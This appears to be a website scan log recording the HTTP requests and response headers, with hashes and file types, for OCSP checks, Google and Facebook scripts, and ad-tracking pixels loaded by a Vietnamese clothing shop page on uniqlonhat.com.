252363badd64d5ec8ad9eb56af41e44bb094d8c80646dd228e90dba5e56c87b8
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 6244
Cache-Control: max-age=138875
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Etag: "638ac897-1d7"
Expires: Mon, 05 Dec 2022 05:39:07 GMT
Last-Modified: Sat, 03 Dec 2022 03:55:03 GMT
Server: ECS (ska/F715)
X-Cache: HIT
Content-Length: 471
www.gstatic.com/images/branding/product/2x/translate_24dp.png
142.250.74.35200 OK 1.8 kB URL HTTP/2 www.gstatic.com/images/branding/product/2x/translate_24dp.png
IP 142.250.74.35:0
File type PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced\012- data
Hash c69c796362406f9e11c7f4bf5bb628da
e489ce95ab56208090868882113d7416abf46775
4dac0026fbfa2615dce30c0af12830863fe885f84387a0147b9e338f548d5d82
GET /images/branding/product/2x/translate_24dp.png HTTP/1.1
Host: www.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://translate.googleapis.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
vary: Origin
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="static-on-bigtable"
report-to: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
content-length: 1842
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Sat, 03 Dec 2022 13:39:57 GMT
expires: Sun, 03 Dec 2023 13:39:57 GMT
cache-control: public, max-age=31536000
last-modified: Thu, 14 Oct 2021 09:08:00 GMT
content-type: image/png
age: 5075
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 472 B IP 142.250.74.131:0
Hash 08ca0238100c906a665f21b1caa97f47
3f605891faeafb51a36cecd25d331bcc450d34e9
35dac74d71c723f7a8e7585174fad51a0115e4a294a2c0d80b63026e25825618
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 472 B IP 142.250.74.131:0
Hash 08ca0238100c906a665f21b1caa97f47
3f605891faeafb51a36cecd25d331bcc450d34e9
35dac74d71c723f7a8e7585174fad51a0115e4a294a2c0d80b63026e25825618
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 472 B IP 142.250.74.131:0
Hash 08ca0238100c906a665f21b1caa97f47
3f605891faeafb51a36cecd25d331bcc450d34e9
35dac74d71c723f7a8e7585174fad51a0115e4a294a2c0d80b63026e25825618
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
connect.facebook.net/en_US/sdk.js?hash=80dd07b48a7943876456f26440518920
31.13.72.12200 OK 88 kB URL HTTP/2 connect.facebook.net/en_US/sdk.js?hash=80dd07b48a7943876456f26440518920
IP 31.13.72.12:0
File type ASCII text, with very long lines (18530)
Hash 0467fcf2b9805b82ac10ecc58e339119
9b78c164ac40bac97a8c1839cc7c96354c6dad06
98f85c5f1b7031d2487f1c25fba815139342ca800a915aef27338122624fb1d5
GET /en_US/sdk.js?hash=80dd07b48a7943876456f26440518920 HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: gzip
access-control-expose-headers: X-FB-Content-MD5
x-fb-content-md5: 32ccb852de33940b633c5cd38ff30e4b
etag: "ed202f8f5f99fe9a371ecf1e221215ab"
content-type: application/x-javascript; charset=utf-8
timing-allow-origin: *
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
expires: Sun, 03 Dec 2023 14:54:47 GMT
cache-control: public,max-age=31536000,stale-while-revalidate=3600,immutable
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
x-fb-rlafr: 0
x-frame-options: DENY
strict-transport-security: max-age=31536000; preload; includeSubDomains
content-md5: BGf88rmAW4KsEOzFjjORGQ==
x-fb-debug: i8wCQW0snz/q+8GCHM11XVikr6RgF94ucqoH5QG/yOFfYD4IYSRkr//XwN0YsdrE/sL+Ftfop2bSVx7F3I/PoQ==
priority: u=3,i
content-length: 88359
x-fb-trip-id: 1904183273
date: Sat, 03 Dec 2022 15:04:32 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
www.google.com/images/cleardot.gif
216.58.207.228200 OK 43 B URL HTTP/2 www.google.com/images/cleardot.gif
IP 216.58.207.228:0
File type GIF image data, version 89a, 1 x 1\012- data
Hash fc94fb0c3ed8a8f909dbc7630a0987ff
56d45f8a17f5078a20af9962c992ca4678450765
2dfe28cbdb83f01c940de6a88ab86200154fd772d568035ac568664e52068363
GET /images/cleardot.gif HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
content-type: image/gif
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="static-on-bigtable"
report-to: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
content-length: 43
date: Sat, 03 Dec 2022 15:04:32 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, no-store, must-revalidate
last-modified: Tue, 22 Oct 2019 18:30:00 GMT
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
googleads.g.doubleclick.net/pagead/html/r20221110/r20190131/zrt_lookup.html
142.250.74.130200 OK 4.2 kB URL HTTP/2 googleads.g.doubleclick.net/pagead/html/r20221110/r20190131/zrt_lookup.html
IP 142.250.74.130:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (2579)
Hash 2fb3574102373e2e076cfa2ff90cdf25
d06c985183def975546d6e47ab6369c11dcf7195
e61cbc207f7fc2f429deceff11e7a339a3d9a9574da6d035054eba02ee381345
GET /pagead/html/r20221110/r20190131/zrt_lookup.html HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
vary: Accept-Encoding
x-content-type-options: nosniff
content-encoding: br
server: cafe
content-length: 4242
x-xss-protection: 0
date: Fri, 02 Dec 2022 15:24:16 GMT
expires: Fri, 16 Dec 2022 15:24:16 GMT
cache-control: public, max-age=1209600
etag: 10353107486223812946
content-type: text/html; charset=UTF-8
age: 85216
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 472 B IP 142.250.74.131:0
Hash e63a3fb1ef1a4ebbbd126969d6ee68ca
8bc9c26950b3899087e25ddea159c28f57b47200
f2ec30377e239f64286ae7dde8032e4e332b6c123f7decc07126fbbcff460a69
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 472 B IP 142.250.74.131:0
Hash baaba92c2ccd740f080a25a9ea5cb3ad
3322d5a9fb0b3a2ec83247eac9865234cbcefece
5150dcbc7293378fff4a337fd0f61bdbbf6b4f64bddba6d0fd270be37e81fe07
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
googleads.g.doubleclick.net/pagead/viewthroughconversion/952322391/?random=502172712&cv=9&fst=1670079868312&num=1&label=VPBwCLuA5GcQ15KNxgM&bg=ffffff&hl=en&guid=ON&resp=GooglemKTybQhCsO&eid=375603260&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_his=1&u_tz=0&u_java=false&u_nplug=0&u_nmime=0&sendb=1&ig=1&frm=0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&tiba=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&hn=www.googleadservices.com&fmt=3&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&ocp_id=gGWLY4uACZ2bygWtz6OoCw&sscte=1&crd=
142.250.74.130302 Found 42 B URL HTTP/2 googleads.g.doubleclick.net/pagead/viewthroughconversion/952322391/?random=502172712&cv=9&fst=1670079868312&num=1&label=VPBwCLuA5GcQ15KNxgM&bg=ffffff&hl=en&guid=ON&resp=GooglemKTybQhCsO&eid=375603260&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_his=1&u_tz=0&u_java=false&u_nplug=0&u_nmime=0&sendb=1&ig=1&frm=0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&tiba=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&hn=www.googleadservices.com&fmt=3&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&ocp_id=gGWLY4uACZ2bygWtz6OoCw&sscte=1&crd=
IP 142.250.74.130:0
File type GIF image data, version 89a, 1 x 1\012- data
Hash d89746888da2d9510b64a9f031eaecd5
d5fceb6532643d0d84ffe09c40c481ecdf59e15a
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
GET /pagead/viewthroughconversion/952322391/?random=502172712&cv=9&fst=1670079868312&num=1&label=VPBwCLuA5GcQ15KNxgM&bg=ffffff&hl=en&guid=ON&resp=GooglemKTybQhCsO&eid=375603260&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_his=1&u_tz=0&u_java=false&u_nplug=0&u_nmime=0&sendb=1&ig=1&frm=0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&tiba=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&hn=www.googleadservices.com&fmt=3&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&ocp_id=gGWLY4uACZ2bygWtz6OoCw&sscte=1&crd= HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 302 Found
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
date: Sat, 03 Dec 2022 15:04:32 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, must-revalidate
location: https://www.google.com/pagead/1p-conversion/952322391/?random=502172712&cv=9&fst=1670079868312&num=1&label=VPBwCLuA5GcQ15KNxgM&bg=ffffff&hl=en&guid=ON&resp=GooglemKTybQhCsO&eid=375603260&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_his=1&u_tz=0&u_java=false&u_nplug=0&u_nmime=0&sendb=1&ig=1&frm=0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&tiba=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&hn=www.googleadservices.com&fmt=3&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&sscte=1&crd=&is_vtc=1&ocp_id=gGWLY4uACZ2bygWtz6OoCw&random=303902612&resp=GooglemKTybQhCsO
content-type: image/gif
x-content-type-options: nosniff
server: cafe
content-length: 42
x-xss-protection: 0
set-cookie: test_cookie=CheckForPermission; expires=Sat, 03-Dec-2022 15:19:32 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 472 B IP 142.250.74.131:0
Hash 08ca0238100c906a665f21b1caa97f47
3f605891faeafb51a36cecd25d331bcc450d34e9
35dac74d71c723f7a8e7585174fad51a0115e4a294a2c0d80b63026e25825618
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
pagead2.googlesyndication.com/pagead/managed/js/adsense/m202211150101/show_ads_impl_with_ama_fy2021.js?client=ca-pub-7004947269569512&plah=uniqlonhat.com&bust=31071035
142.250.74.130200 OK 119 kB URL HTTP/2 pagead2.googlesyndication.com/pagead/managed/js/adsense/m202211150101/show_ads_impl_with_ama_fy2021.js?client=ca-pub-7004947269569512&plah=uniqlonhat.com&bust=31071035
IP 142.250.74.130:0
File type ASCII text, with very long lines (6148)
Size 119 kB (119174 bytes)
Hash a42e964aca4a0e09249df557c73b94f8
464970d4ba1a9691aed5a56d2ee2c6927b33add0
d834466789b3cfc4504c0651e46913cc875554a420c88ae4efd7a83fbee86327
GET /pagead/managed/js/adsense/m202211150101/show_ads_impl_with_ama_fy2021.js?client=ca-pub-7004947269569512&plah=uniqlonhat.com&bust=31071035 HTTP/1.1
Host: pagead2.googlesyndication.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
vary: Accept-Encoding
date: Sat, 03 Dec 2022 15:04:32 GMT
expires: Sat, 03 Dec 2022 15:04:32 GMT
cache-control: private, max-age=3600, stale-while-revalidate=3600
content-type: text/javascript; charset=UTF-8
etag: 906544984421775577
x-content-type-options: nosniff
content-disposition: attachment; filename="f.txt"
content-encoding: br
server: cafe
content-length: 119174
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
www.google.com/pagead/1p-conversion/952322391/?random=502172712&cv=9&fst=1670079868312&num=1&label=VPBwCLuA5GcQ15KNxgM&bg=ffffff&hl=en&guid=ON&resp=GooglemKTybQhCsO&eid=375603260&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_his=1&u_tz=0&u_java=false&u_nplug=0&u_nmime=0&sendb=1&ig=1&frm=0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&tiba=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&hn=www.googleadservices.com&fmt=3&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&sscte=1&crd=&is_vtc=1&ocp_id=gGWLY4uACZ2bygWtz6OoCw&random=303902612&resp=GooglemKTybQhCsO
216.58.207.228302 Found 42 B URL HTTP/2 www.google.com/pagead/1p-conversion/952322391/?random=502172712&cv=9&fst=1670079868312&num=1&label=VPBwCLuA5GcQ15KNxgM&bg=ffffff&hl=en&guid=ON&resp=GooglemKTybQhCsO&eid=375603260&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_his=1&u_tz=0&u_java=false&u_nplug=0&u_nmime=0&sendb=1&ig=1&frm=0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&tiba=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&hn=www.googleadservices.com&fmt=3&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&sscte=1&crd=&is_vtc=1&ocp_id=gGWLY4uACZ2bygWtz6OoCw&random=303902612&resp=GooglemKTybQhCsO
IP 216.58.207.228:0
File type GIF image data, version 89a, 1 x 1\012- data
Hash d89746888da2d9510b64a9f031eaecd5
d5fceb6532643d0d84ffe09c40c481ecdf59e15a
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
GET /pagead/1p-conversion/952322391/?random=502172712&cv=9&fst=1670079868312&num=1&label=VPBwCLuA5GcQ15KNxgM&bg=ffffff&hl=en&guid=ON&resp=GooglemKTybQhCsO&eid=375603260&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_his=1&u_tz=0&u_java=false&u_nplug=0&u_nmime=0&sendb=1&ig=1&frm=0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&tiba=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&hn=www.googleadservices.com&fmt=3&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&sscte=1&crd=&is_vtc=1&ocp_id=gGWLY4uACZ2bygWtz6OoCw&random=303902612&resp=GooglemKTybQhCsO HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://uniqlonhat.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 302 Found
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
date: Sat, 03 Dec 2022 15:04:32 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, no-store, must-revalidate
location: https://www.google.no/pagead/1p-conversion/952322391/?random=502172712&cv=9&fst=1670079868312&num=1&label=VPBwCLuA5GcQ15KNxgM&bg=ffffff&hl=en&guid=ON&resp=GooglemKTybQhCsO&eid=375603260&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_his=1&u_tz=0&u_java=false&u_nplug=0&u_nmime=0&sendb=1&ig=1&frm=0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&tiba=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&hn=www.googleadservices.com&fmt=3&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&sscte=1&crd=&is_vtc=1&ocp_id=gGWLY4uACZ2bygWtz6OoCw&random=303902612&resp=GooglemKTybQhCsO&ipr=y&prhg=0
content-type: image/gif
content-security-policy: script-src 'none'; object-src 'none'
x-content-type-options: nosniff
server: cafe
content-length: 42
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 471 B IP 142.250.74.131:0
Hash a06afa1875c7542451698bb20623def1
b6075db78f93567b4a115d4cc0c1cc7f170de3f6
0257f7232d4431fadd985f2137df900816246f51936ae8521d35f44b21fa6c83
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 471 B IP 142.250.74.131:0
Hash d177680f261fa0b5bf3d5ae3ed69af85
96cdc11262db0a9531fe0cd00e908f3e824c89b3
08eac8282cf4566d382816edac93db8581b65dc2898fc7ea80d7424224ed29ff
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ssl.gstatic.com/accounts/o/1832714284-postmessagerelay.js
172.217.21.163200 OK 4.3 kB URL HTTP/2 ssl.gstatic.com/accounts/o/1832714284-postmessagerelay.js
IP 172.217.21.163:0
File type ASCII text, with very long lines (2267)
Hash 3f7502705229ccec9d066c5cd75e6c31
ede1663155afaa5a5213d075e6295c6d839b05c3
2be5113d3022d1819a19f327235d287a2538a03741fc08ccd9d55cc1d78b6282
GET /accounts/o/1832714284-postmessagerelay.js HTTP/1.1
Host: ssl.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://accounts.google.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/federated-signon-mpm-access
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="federated-signon-mpm-access"
report-to: {"group":"federated-signon-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/federated-signon-mpm-access"}]}
content-length: 4294
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Tue, 29 Nov 2022 08:48:19 GMT
expires: Wed, 29 Nov 2023 08:48:19 GMT
cache-control: public, max-age=31536000
last-modified: Sat, 19 Nov 2022 03:11:36 GMT
content-type: text/javascript
age: 368173
